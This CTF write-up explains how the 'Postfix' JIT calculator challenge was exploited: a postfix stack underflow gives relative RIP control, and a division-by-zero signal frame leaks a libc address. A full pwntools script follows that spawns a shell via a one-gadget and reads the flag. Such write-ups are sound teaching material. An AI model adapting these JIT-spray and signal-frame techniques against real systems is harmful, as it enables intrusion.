Postfix

4 files available

ld-linux-x86-64.so.2attachment libc.so.6attachment postfix_jitattachment vm.tar.gzattachment

Description

Maths is hard so I made this super-fast JIT-powered calculator. You can even define funcions! It has many security features, I bet it's super safe!

Note: A VM is provided to help you replicate the remote setup. Keep in mind that this is NOT a kernel/microarch pwn!

Analysis

Checksec

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

As it can be seen, the binary has all the common mitigations enabled.

Seccomp

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x0000000c  A = instruction_pointer >> 32
 0001: 0x25 0x00 0x01 0x00006000  if (A <= 0x6000) goto 0003
 0002: 0x25 0x00 0x01 0x00007000  if (A <= 0x7000) goto 0004
 0003: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0004: 0x06 0x00 0x00 0x00000000  return KILL

A simple seccomp filter is also present and it forbids syscalls coming from IPs in the range 0x600000000000 - 0x700000000000.

Reversing

The binary allows you to define functions with up to one variable in postfix notation. The functions, after being parsed, are JIT-compiled in native x86 code. They can then be called, eventually providing the value of the variable.

Most of the logic happens during the parsing and compilation of the postfix expression. This starts with the parse(expr_stack_t *out_stack, char *input, char **parsed) function: the string is split into tokens, which then get pushed onto an expr_stack_t structure as a pair of value and type.

When an operator is pushed (through the push_op function) it gets optimized away if the two previous tokens are constants, since the result can be computed at parse-time as it does not depend on other operations or variables.

The expr_stack_t is then passed to jit_expr, which does the actual translation to x86 code. A prologue which zeroes all registers and migrates to a separate stack (jit_stk) is generated and it looks like this:

xor eax, eax ; xor all regs except from rdi and rsp
xor ebx, ebx
...
wrgsbase rsp ; save rsp for later
mov rsp, jit_stk ; migrate to jit_stk
call actual_jit_code ; call jit code
rdgsbase rsp ; restore rsp
ret
actual_jit_code:
...

The stack is then iterated:

known-values become push operations through the opt_push function, which emits different instructions depending on the size of the value
variables become push rdi instructions (as the variable is passed through rdi)
operators are translated roughly to pop rbx; pop rax; add/sub/imul/idiv ...; push rax

The opt_push function also applies constant-blinding when a 32-bit or 64-bit constant is pushed as a mitigation against JIT-sprays. This is done by using val ^ rnd where val is the actual value and rnd is a random value which gets generated by the function. A xor operation is then emitted to decrypt this constant at runtime and push it onto the stack. The generated code might look like this:

; opt_push(0xAAAAAAAA)

mov rax, 0xB00CE592  ; = 0xAAAAAAAA ^ 0x1AA64F38
xor rax, 0x1AA64F38      
push rax             ; = 0xAAAAAAAA

The final result is then popped through pop rax.

As a final note, the JIT code pages are allocated through jit_init at random offsets in the region 0x600000000000-0x700000000000, which is the same range forbidden by the seccomp filter. The JIT stack is allocated by jit_stk_init at a random offset in the region 0x300000000000-0x400000000000.

Vulnerabilities

Relative RIP control inside the JIT code

The main vulnerability is in the push_op function: it should require two numbers on the stack to appply the operator, but the only check is for the stack containing at least two elements, which might not be both numbers. This can allow an attacker to perform a stack underflow, which, using the JIT operations, makes it possible to add arbitrary offsets to the return address of the JIT prologue.

An example might be 0 x + + 0, which will add x to the return address. The final constant is required as the code inside parse keeps a variable named count which keeps track of the amount of elements on the stack at runtime and is checked at the end of the function. If this value is different from 1 (which should be the element returned by the function), the parse function will fail.

Information leak through the signal handler stack frame

When a division by zero occurs during the JIT execution, a SIGFPE signal is raised, and a registered sighandler is called. The handler will exit gracefully from the JIT area (through a siglongjmp) and inform the user that an error occurred without crashing the program. Since the sighandler isn't registered with the SA_ONSTACK flag, when it gets invoked during JIT execution it will just use the JIT stack, spilling its stackframe onto it. This can be used to leak various information such as a libc address. It must be kept in mind that the signal handler stack frame has a variable size, since it depends on the size of the XSAVE area, which depends on the enabled CPU features (and that's why the challenge was run under QEMU). This should not be a problem since the binary prints CPUID information at the start, including the maximum and actual size of this area.

Exploitation

We can first trigger the leak by doing a division by zero. To get it as close as possible we can abuse the stack underflow caused by the wrong check in push_op. A payload such as 0 x * * * * / 0 0 0 0 should do the trick. We can play with the number of * and 0 (which must anyway be equal to match the count == 1 constaint) to lower the signal handler stack frame.

Since we can't really pop values from the stack arbitrarily, we'll have to abuse the relative rip control to try and move the stack pointer near a libc leak. We can then add a relative offset to this leak to get a one-gadget, which will give us a shell when the code returns. We can abuse the fact that 8-bit and 16-bit values are not blinded to try and encode instructions. Furthermore, 16-bit values still use a 32-bit push instruction, causing them to be sign-extended. I found the enter instruction to be particularly useful, since it allows us to move the stack pointer and we can encode it by pushing 0xXXC8 where XX is the amount of bytes which will be added to the stack pointer. As long as XX is less than 0x7F, the value will be zero-extended and cause the encoding of a enter XX, 0 instruction, which will decrement the stack pointer by XX.

Using this we can reach a libc address and change it to a one-gadget. We can then push one value (the JIT will need to pop a return value) and at the ret instruction we'll get a shell. A payload for this might be x 0 * x - {rsp_offset << 8 | 0xc8} - {SPRAYED_INSN_OFFSET} + + {rsp_offset << 8 | 0xc8} x + + 0, where x is the value to be added to the libc pointer.

Exploit

#!/usr/bin/env python3

from pwn import *

HOST = args.HOST if args.HOST else "localhost"
PORT = args.PORT if args.PORT else 1337

def conn():
    r = remote(HOST, PORT)
    return r

def create_func(func_id, expr):
    r.sendafter(b"> ", b"c\n")
    r.sendafter(b"id: ", func_id.encode() + b"\n")
    r.sendafter(b">>> ", expr.encode() + b"\n")

def execute_func(func_id, arg, get_res=False):
    r.sendafter(b"> ", b"x\n")
    r.sendafter(b"id: ", func_id.encode() + b"\n")
    r.sendafter(b": ", arg.encode() + b"\n")
    if get_res:
        r.recvuntil("result: ")
        return int(r.recvline().decode().strip())

def main():
    global r
    r = conn()

    r.recvuntil(b"supported features: " + context.newline)
    r.recvlines(4)
    xsave_size = int(r.recvline().split(b" ")[1], 16)
    log.info(f"xsave_max_size: {hex(xsave_size)}")

    # 0xebcf8 execve("/bin/sh", rsi, rdx)
    # constraints:
    #     address rbp-0x78 is writable
    #     [rsi] == NULL || rsi == NULL
    #     [rdx] == NULL || rdx == NULL

    CODE_OFFSET = 49

    trigger_sighandler = "0 x " + ("* " * (xsave_size//8 - 7)) + "/ " + ("0 " * (xsave_size//8 - 7))
    payload = f"x 0 * x - {0x60c8} - {CODE_OFFSET} + + {0x60c8} x + + 0"

    create_func("DIV0", trigger_sighandler)
    execute_func("DIV0", "0")

    # <__execvpe+1144>:	lea    rdi,[rip+0xec999]
    one_gadget_addr = 0xebcf8
    log.info(f"one_gadget_addr: {hex(one_gadget_addr)}")

    # <_IO_2_1_stdin_+131>:	0x00000000
    sighandler_leak_addr = 0x219b23
    log.info(f"sighandler_leak_addr: {hex(sighandler_leak_addr)}")

    offset = sighandler_leak_addr - one_gadget_addr
    log.info(f"offset: {hex(offset)}")

    create_func("PWN", payload)
    execute_func("PWN", str(-offset))

    r.sendline(b"cat flag.txt")
    log.info(r.recvregex(b"snakeCTF{.*}", timeout=5).strip().split(context.newline)[-1].decode())
    r.close()

if __name__ == "__main__":
    main()